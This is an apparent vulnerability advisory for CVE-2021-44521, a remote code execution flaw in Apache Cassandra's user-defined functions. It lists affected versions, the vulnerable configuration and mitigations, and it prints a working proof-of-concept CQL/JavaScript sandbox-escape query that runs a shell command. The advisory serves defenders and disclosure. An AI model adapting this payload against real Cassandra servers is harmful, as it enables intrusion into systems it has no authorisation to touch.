Insufficient sandboxing of user-defined functions in Apache Cassandra leads to remote code execution
[3.0.0-alpha1, 3.0.25], fixed in 3.0.26
[3.1, 3.11.11], fixed in 3.11.12
[4.0-alpha1, 4.0.1], fixed in 4.0.2
CVE-2021-44521 is an RCE (remote code execution) issue in Apache Cassandra. This Apache vulnerability is easy to exploit and has the potential to wreak havoc on systems, but luckily only manifests in non-default configurations of Cassandra.
Cassandra deployments are vulnerable to CVE-2021-44521 when the cassandra.yaml configuration file contains the following definitions:
enable_user_defined_functions: true
enable_scripted_user_defined_functions: true
enable_user_defined_functions_threads: false
A malicious authenticated user can run a trivial (publicly available) SQL query that causes remote code execution, by running JavaScript code in the query that abuses the JavaScript engine (Nashorn) and escapes the security sandbox
create or replace function x.escape_system(name text) RETURNS NULL ON NULL INPUT RETURNS text LANGUAGE javascript AS $$
var System = Java.type("java.lang.System");System.setSecurityManager(null);this.engine.factory.scriptEngine.eval('java.lang.Runtime.getRuntime().exec("touch hacked")');name $$;
- If UDFs are not actively used, they can be completely disabled by setting
enable_user_defined_functionstofalse(which is the default value) - If UDFs are needed, set
enable_user_defined_functions_threadstotrue(which is the default value) - Remove the permissions of creating, altering and executing functions for untrusted users by removing the following permissions:
ALL FUNCTIONS,ALL FUNCTIONS IN KEYSPACEandFUNCTIONforCREATE,ALTERandEXECUTEqueries (see blog post for example query)
(JFrog) CVE-2021-44521: RCE Vulnerability in Apache Cassandra